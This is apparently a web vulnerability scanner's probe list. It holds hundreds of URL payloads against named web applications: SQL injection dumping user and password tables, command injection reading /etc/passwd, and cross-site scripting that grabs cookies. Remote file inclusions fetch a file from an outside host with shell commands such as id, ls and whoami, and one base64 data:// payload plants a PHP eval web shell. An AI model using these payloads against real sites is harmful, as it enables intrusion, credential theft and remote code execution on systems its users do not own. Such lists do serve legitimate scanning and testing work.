shoppingcart.php?a=addshopingcart&goodsid=1%20and%20@`'`%20/*!50000union*/%20select%20null,null,null,null,null,null,null,null,null,null,md5(333),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20where%201=1%20or%20@`'`&buynum=1&goodsattr=tpcs
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
shoutbox.php?language=http://www.yxlink.com/nvs_test.txt
shoutbox.php?root=http://www.yxlink.com/nvs_test.txt?cmd=id
show.php?file=http://www.yxlink.com/nvs_test.txt
show.php?id=http://www.yxlink.com/nvs_test.txt
show.php?page=http://www.yxlink.com/nvs_test.txt
show.php?path=http://www.yxlink.com/nvs_test.txt
show/index.php?prefix=http://www.yxlink.com/nvs_test.txt
show_archives.php?cutepath=http://www.yxlink.com/nvs_test.txt?
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
showcheckins.cgi?person=<script>alert('Vulnerable')</script>
showmail.pl?Folder=<script>alert(document.cookie)</script>
showthread.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
showtopiclist.aspx?direct=\x22><script>alert(123)</script>&search=1
showuser.aspx?orderby=atestu&ordertype=%22</script><script>alert(123)</script>&page=1
showuser.cgi
sign_in/
signer/final.php?smiley=http://www.yxlink.com/nvs_test.txt?
signin.php?sent=1&AMG_serverpath=http://www.yxlink.com/nvs_test.txt
signon
simple/view_page?mv_arg=|cat%20/etc/passwd|
sinagb.php?fuss=http://www.yxlink.com/nvs_test.txt
sinapis.php?fuss=http://www.yxlink.com/nvs_test.txt
site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html
site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html
sitebar/Integrator.php?file=http://www.yxlink.com/nvs_test.txt
sitebar/index.php?writerFile=http://www.yxlink.com/nvs_test.txt
sitebuilder/admin/top.php?admindir=http://www.yxlink.com/nvs_test.txt
sitemap.xml.php?dir[classes]=http://www.yxlink.com/nvs_test.txt
siteminder/smadmin.html
sites/default/settings.php
siteserver/UserRole/background_userAdd.aspx?UserName=yjfjnpuc'%20and%201=str(123.4,8,4)%20and%201='1&ReturnUrl=../cms/console_user.aspx
siteserver/bbs/background_post.aspx?UserName=&Title=%27%20and%20%201=str(123.4,8,4)%20and%201=%271&DateFrom=&DateTo=&ForumID=0
siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=str(123.4,8,4)%20and%201=%27&DateFrom=&DateTo=&ForumID=0
siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=a'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/cms/background_contentsGroup.aspx?publishmentSystemID=1&contentGroupName=test'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/cms/background_fileTree.aspx?PublishmentSystemID=0&RootPath=&CurrentRootPath=include
siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=str(123.4,8,4)%20and%201='1&DateFrom=&DateTo=
siteserver/cms/background_nodeGroup.aspx?PublishmentSystemID=0&SetTaxis=True&GroupName=test4'%20and%201=str(123.4,8,4)%20and%201='1&Direction=DOWN
siteserver/cms/console_user.aspx?PageNum=0&Keyword=1%27%20and%201=str(123.4,8,4)%20and%201=%271&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0
siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20str(123.4,8,4)=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All
siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20str(123.4,8,4)=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName
siteserver/userRole/background_administrator.aspx?RoleName='%20and%20str(123.4,8,4)=1%20and%201='1&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName
siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20str(123.4,8,4)=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0
skin/board/default/doctype.php?dir=http://www.yxlink.com/nvs_test.txt
skin/dark/template.php?path=http://www.yxlink.com/nvs_test.txt
skin/gold/template.php?path=http://www.yxlink.com/nvs_test.txt
skin/html/table.php?pachtofile=http://www.yxlink.com/nvs_test.txt
skin/original/template.php?path=http://www.yxlink.com/nvs_test.txt
skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yxlink.com/nvs_test.txt
skins/advanced/advanced1.php?pluginpath[0]=http://www.yxlink.com/nvs_test.txt
skins/default.php?dir_inc=http://www.yxlink.com/nvs_test.txt
skins/header.php?ote_home=http://www.yxlink.com/nvs_test.txt
skins/phpchess/layout_admin_cfg.php?Root_Path=http://www.yxlink.com/nvs_test.txt
skins/phpchess/layout_cfg.php?Root_Path=http://www.yxlink.com/nvs_test.txt
skins/phpchess/layout_t_top.php?Root_Path=http://www.yxlink.com/nvs_test.txt
skysilver/login.tpl.php?theme=http://www.yxlink.com/nvs_test.txt?
slogin_lib.inc.php?slogin_path=http://www.yxlink.com/nvs_test.txt
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smarty.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
smarty/smarty_class.php?_smarty_compile_path=http://www.yxlink.com/nvs_test.txt
smilies.php?config=http://www.yxlink.com/nvs_test.txt
sms_config/gateway.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt
snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(md5(333),char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.yxlink.com/nvs_test.txt
snort/base_stat_common.php?BASE_path=http://www.yxlink.com/nvs_test.txt
soapdocs/ReleaseNotes.html
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
social2/user.php?userId=12'
social_game_play.php?path=http://www.yxlink.com/nvs_test.txt?
software/
software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=http://www.yxlink.com/nvs_test.txt
soinfo.php?\x5C\x22><script>alert('Vulnerable')</script>
somefile.png?\x22><script>alert('xss')</script>
song.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
sort.php?skinco=black\x22><script>alert(111)</script>
sort.php?skinco=black\x22><script>alert(1111);</script>
source.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
source/
source/mod/rss/channeledit.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/mod/rss/post.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/mod/rss/view.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/mod/rss/viewitem.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/plugin/doconline/doconline.php?doc=/config/config_global_default.php
sources/Admin/admin_cats.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/Admin/admin_edit.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/Admin/admin_import.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/Admin/admin_templates.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/functions.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/help.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.yxlink.com/nvs_test.txt
sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.yxlink.com/nvs_test.txt?cmd=ls
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.yxlink.com/nvs_test.txt
sources/mail.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/misc/new_day.php?path=http://www.yxlink.com/nvs_test.txt
sources/news.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/post.php?fil_config=http://www.yxlink.com/nvs_test.txt
sources/template.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/tourney/index.php?page=http://www.yxlink.com/nvs_test.txt?
space.php?suid=1%d5%27%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5(333),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.yxlink.com/nvs_test.txt
spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
spellcheckwindowframeset.php?SpellIncPath=http://www.yxlink.com/nvs_test.txt
spyweb.php
sql/
sqlqhit.asp
squirrelcart/cart_content.php?cart_isp_root=http://www.yxlink.com/nvs_test.txt
src/
src/ark_inc.php?cfg_pear_path=http://www.yxlink.com/nvs_test.txt?
src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.yxlink.com/nvs_test.txt
src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
src/scripture.php?pageHeaderFile=http://www.yxlink.com/nvs_test.txt?
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
ssdefs/siteseed.dtd
ssi.php?a=out&type=xml&f=0)'
ssi/
starnet/themes/c-sky/main.inc.php?cmsdir=http://www.yxlink.com/nvs_test.txt?
start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
start.php?config=alper.inc.php
start.php?lang=http://www.yxlink.com/nvs_test.txt
start.php?pg=http://www.yxlink.com/nvs_test.txt
stat_modules/users_age/module.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
static/
stats.php?vwar_root=http://www.yxlink.com/nvs_test.txt
stats.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
stats/
stats/statsbrowse.asp?filepath=c:\x5C&Opt=3
status?full=true
store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
store/agora.cgi?page=whatever33.html
story/add.php?forumid=\xE2\x80\x99
stphpapplication.php?STPHPLIB_DIR=http://www.yxlink.com/nvs_test.txt
stphpbtnimage.php?STPHPLIB_DIR=http://www.yxlink.com/nvs_test.txt
stphpform.php?STPHPLIB_DIR=http://www.yxlink.com/nvs_test.txt
str.php?p=http://www.yxlink.com/nvs_test.txt
streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.yxlink.com/nvs_test.txt
strload.php?LangFile=http://www.yxlink.com/nvs_test.txt
struts-virtdir/<script>alert('test')</script>.do
studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://www.yxlink.com/nvs_test.txt?
studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt?
style/
style/default/admin/open.gif
styles.php?toroot=http://www.yxlink.com/nvs_test.txt
styles/
styles/default/global_header.php?installed=23&domain=http://www.yxlink.com/nvs_test.txt
su.php
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
submit_abuse.php?path_prefix=http://www.yxlink.com/nvs_test.txt
submit_comment.php?path_prefix=http://www.yxlink.com/nvs_test.txt
subscp.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
subscription.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
suite/index.php?pg=http://www.yxlink.com/nvs_test.txt
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
supasite/admin_auth_cookies.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_mods.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_news.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_settings.php?supa[include_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_topics.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_users.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/admin_utilities.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/backend_site.php?supa[include_path]=http://www.yxlink.com/nvs_test.txt
supasite/common_functions.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/site_comment.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
supasite/site_news.php?supa[db_path]=http://www.yxlink.com/nvs_test.txt
support/include/open_form.php?include_dir=http://www.yxlink.com/nvs_test.txt?cmd=pwd
support/index.php?main=http://www.yxlink.com/nvs_test.txt
support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=<script>alert(222)</script>&Tech_URL=[XSS]&Apply=Apply
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
survey.inc.php?path=http://www.yxlink.com/nvs_test.txt
surveys/survey.inc.php?path=http://www.yxlink.com/nvs_test.txt
suud.php
sw/index_sw.php?doc_directory=http://www.yxlink.com/nvs_test.txt
sw/lib_comment/comment.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_find/find.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_session/session.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_up_file/file.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_up_file/find_file.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_user/find_user.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
sw/lib_user/user.php?doc_directory=http://www.yxlink.com/nvs_test.txt?
swordcms/login.jsp
swordcms/platform/components/fckeditor/editor/plugins/upload/upload.jsp
sws/admin.html
sys/code/box.inc.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
sysmanage/
sysnet/registration.jsf?');};alert(222);</script><!--
system.php
system/
system/ImageImageMagick.php?glConf[path_system]=http://www.yxlink.com/nvs_test.txt
system/_b/contentFiles/gBIndex.php?gBRootPath=http://www.yxlink.com/nvs_test.txt?
system/admin/include/item_main.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/admin/include/upload_form.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/command/admin.cmd.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/command/download.cmd.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
system/eWebEditorNet/admin/login.aspx
system/eWebEditorNet/admin_login.aspx
system/editor/admin/login.aspx
system/editor/admin/login.php
system/editor/admin_login.asp
system/editor/admin_login.aspx
system/editor/admin_login.php
system/editor/login.asp
system/eweb/admin/login.asp
system/eweb/admin/login.aspx
system/eweb/admin/login.jsp
system/eweb/admin/login.php
system/eweb/admin_login.asp
system/eweb/admin_login.aspx
system/eweb/admin_login.jsp
system/eweb/admin_login.php
system/ewebeditor/admin/login.php
system/ewebeditor/admin_login.asp
system/ewebeditor/admin_login.aspx
system/ewebeditor/admin_login.php
system/ewebeditor/login.asp
system/ewebeditor/login.aspx
system/funcs/xkurl.php?PEARPATH=http://www.yxlink.com/nvs_test.txt
system/includes/pageheaderdefault.inc.php?_sysSessionPath=http://www.yxlink.com/nvs_test.txt
system/login.php?site_path=http://www.yxlink.com/nvs_test.txt
system/rss.php?id=1'
system/webeditor/admin_login.asp
system_dntb/Advanced.aspx
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
t.php
t47.php
tag.php?id=1%27
tagit2b/tagmin/delTagUser.php?configpath=http://www.yxlink.com/nvs_test.txt?
tags.php?BBCodeFile=http://www.yxlink.com/nvs_test.txt
taxonservice.php?dir=http://www.yxlink.com/nvs_test.txt?
tcb/files/auth/r/root
teatro/pub/pub08_comments.php?basePath=http://www.yxlink.com/nvs_test.txt
technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.yxlink.com/nvs_test.txt?
temp/
template.php?actionsPage=http://www.yxlink.com/nvs_test.txt?
template.php?blog_theme=http://www.yxlink.com/nvs_test.txt
template.php?pagina=http://www.yxlink.com/nvs_test.txt
template/Noir/index.php?site_path=http://www.yxlink.com/nvs_test.txt
template/Vert/index.php?pageAll=http://www.yxlink.com/nvs_test.txt
template/Vert/index.php?site_path=http://www.yxlink.com/nvs_test.txt
template/admin/skin/login/login.css
template/barnraiser_01/p_new_password.tpl.php?templatePath=http://www.yxlink.com/nvs_test.txt
template/default/footer.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?cmd=ls
template/default/test/header.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?cmd=ls
template/gwb/user_bottom.php?config[template_path]=http://www.yxlink.com/nvs_test.txt
template/purpletech/base_include.php?page=http://www.yxlink.com/nvs_test.txt?
template/rwb/user_bottom.php?config[template_path]=http://www.yxlink.com/nvs_test.txt
template/rwb/user_bottom.php?config[template_path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
template_csv.php?rInfo[content]=http://www.yxlink.com/nvs_test.txt
templates/
templates/2blue/bodyTemplate.php?serverPath=http://www.yxlink.com/nvs_test.txt
templates/Official/part_userprofile.php?template_path=http://www.yxlink.com/nvs_test.txt
templates/barrel/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/barry/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/be2004-2/index.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
templates/datumVonDatumBis.inc.php?root=http://www.yxlink.com/nvs_test.txt
templates/default/header.inc.php?menu=http://www.yxlink.com/nvs_test.txt
templates/default/index_logged.php?main_loaded=1&cur_module=http://www.yxlink.com/nvs_test.txt
templates/default/posting.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/default/postreply.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/default/tpl_message.php?right_file=http://www.yxlink.com/nvs_test.txt
templates/deluxe/pm/newpm.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/deluxe/posting.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/deluxe/postreply.php?templatefolder=http://www.yxlink.com/nvs_test.txt
templates/footer.inc.php?root=http://www.yxlink.com/nvs_test.txt
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
templates/header.inc.php?root=http://www.yxlink.com/nvs_test.txt
templates/mylook/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/oerdec/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/pb/language/lang_nl.php?temppath=http://www.yxlink.com/nvs_test.txt
templates/penguin/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/sidebar/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/slashdot/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/stylesheets.php?root=http://www.yxlink.com/nvs_test.txt
templates/text-only/template.tpl.php?renderer=http://www.yxlink.com/nvs_test.txt
templates/tmpl_dfl/scripts/index.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
test
test-cgi.exe?<script>alert(document.cookie)</script>
test-cgi?/*
test.php
test.php%20
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test/info.php
test/jsp/Language.jsp
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/phpinfo.php
test/realPath.jsp
testcgi.exe
testcgi.exe?<script>alert(document.cookie)</script>
testing/
tests.php
texis.exe/junk
texis/junk
thebox/bannedusers.php?file=http://www.yxlink.com/nvs_test.txt
theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
theme/breadcrumb.php?rootBase=http://www.yxlink.com/nvs_test.txt?
theme/default.php?root=http://www.yxlink.com/nvs_test.txt
theme/format.php?_page_content=http://www.yxlink.com/nvs_test.txt?
theme/format.php?_page_css=http://www.yxlink.com/nvs_test.txt?
theme/frames1.php?root=http://www.yxlink.com/nvs_test.txt
theme/frames1_center.php?root=http://www.yxlink.com/nvs_test.txt
theme/frames1_left.php?root=http://www.yxlink.com/nvs_test.txt
theme/frames1_top.php?root=http://www.yxlink.com/nvs_test.txt
theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yxlink.com/nvs_test.txt
theme/settings.php?pfad_z=http://www.yxlink.com/nvs_test.txt
theme/test1.php?root=http://www.yxlink.com/nvs_test.txt
theme/test2.php?root=http://www.yxlink.com/nvs_test.txt
theme/test3.php?root=http://www.yxlink.com/nvs_test.txt
theme/test4.php?root=http://www.yxlink.com/nvs_test.txt
theme/test5.php?root=http://www.yxlink.com/nvs_test.txt
theme/test6.php?root=http://www.yxlink.com/nvs_test.txt
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\x5C\x22><script>alert('Vulnerable')</script>,/system/status/session
themes.php?GLOBALS[theme_path]=http://www.yxlink.com/nvs_test.txt?
themes/blackorange.php?root=http://www.yxlink.com/nvs_test.txt
themes/container.php?theme_directory=http://www.yxlink.com/nvs_test.txt%00
themes/default/index.php?meta=http://www.yxlink.com/nvs_test.txt
themes/default/index.php?phpincdir=http://www.yxlink.com/nvs_test.txt
themes/default/layouts/standard.php?page_include=http://www.yxlink.com/nvs_test.txt?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
themes/default/preview_post_completo.php?dir=http://www.yxlink.com/nvs_test.txt
themes/header.php?theme_directory=http://www.yxlink.com/nvs_test.txt%00
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
themes/ubb/login.php?theme=http://www.yxlink.com/nvs_test.txt
thread.php?skinco=black\x22><script>alert(111)</script>
thread.php?skinco=black\x22><script>alert(222);</script>
thumb.php?url=data://text/plain;base64,PD9waHAgaWYoJF9QT1NUW2NdKXtldmFsKCRfUE9TVFtjXSk7fWVsc2V7cGhwaW5mbygpO30/Pg==&w=&t=.php&r=1
thumbnail.php?module=gallery&GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt
ticket.php?id=99999
tiki-galleries.php/>\x22><Script>alert(1)</scRipt>
tiki-list_file_gallery.php/>\x22><Script>alert(2)</scRipt>
tiki-listpages.php/>\x22><Script>alert(3)</scRipt>
tiki-orphan_pages.php/>\x22><Script>alert(4)</scRipt>
tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.yxlink.com/nvs_test.txt
timedifference.php?la=http://www.yxlink.com/nvs_test.txt
titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,md5(333),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/
tmp_view.php?file=/etc/passwd
toolbar.loudmouth.php?mainframe=http://www.yxlink.com/nvs_test.txt
tools/update_translations.php?_SESSION[path]=http://www.yxlink.com/nvs_test.txt?
top.php?laypath=http://www.yxlink.com/nvs_test.txt
topic/entete.php?subpath=http://www.yxlink.com/nvs_test.txt
toplist.php?f=toplist_top10&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
topsites/index.php?page=http://www.yxlink.com/nvs_test.txt?&cmd=uname -a
towels-0.1/src/scripture.php?pageHeaderFile=http://www.yxlink.com/nvs_test.txt
trace.axd
track.php?path=http://www.yxlink.com/nvs_test.txt
transcripts.php?action=view&deptid=1&userid=0&search_string=<script>alert(444)</script>
tsep/include/colorswitch.php?tsep_config[absPath]=http://www.yxlink.com/nvs_test.txt
ttCMS_path/lib/db/ez_sql.php?lib_path=http://www.yxlink.com/nvs_test.txt
twebs/modules/misc/usermods.php?ROOT=http://www.yxlink.com/nvs_test.txt
u.php
ubbt.inc.php?GLOBALS[thispath]=http://www.yxlink.com/nvs_test.txt?
uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:8089&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
unavailable.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
unsubs.php?scdir=http://www.yxlink.com/nvs_test.txt
up.php?my[root]=http://www.yxlink.com/nvs_test.txt
update.php
update08.php?configfile=http://www.yxlink.com/nvs_test.txt
upfile4k2.php
upgrade/index.php/\x22><IMG SRC=\x22javascript:alert(2222)
upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=http://www.yxlink.com/nvs_test.txt
upload.asp
upload.php?save_path=http://www.yxlink.com/nvs_test.txt?
upload.php?type=\x5C\x22<script>alert(document.cookie)</script>
upload/admin/frontpage_right.php?loadadminpage=http://www.yxlink.com/nvs_test.txt?
upload/top.php?maindir=http://www.yxlink.com/nvs_test.txt?
upload/xax/admin/modules/install_module.php?level=http://www.yxlink.com/nvs_test.txt?
upload/xax/admin/patch/index.php?level=http://www.yxlink.com/nvs_test.txt?
upload/xax/ossigeno/admin/install_module.php?level=http://www.yxlink.com/nvs_test.txt?
upload/xax/ossigeno/admin/uninstall_module.php?level=http://www.yxlink.com/nvs_test.txt?
upload_local.php?target=http://www.yxlink.com/nvs_test.txt
upload_local.php?target=http://www.yxlink.com/nvs_test.txt?
upload_multi.php?target=http://www.yxlink.com/nvs_test.txt
upload_multi.php?target=http://www.yxlink.com/nvs_test.txt?
url_placeholder/pvm_cert_serveraction.php ?ajax=1&action=>\x22'><script>alert(document.cookie)</script>
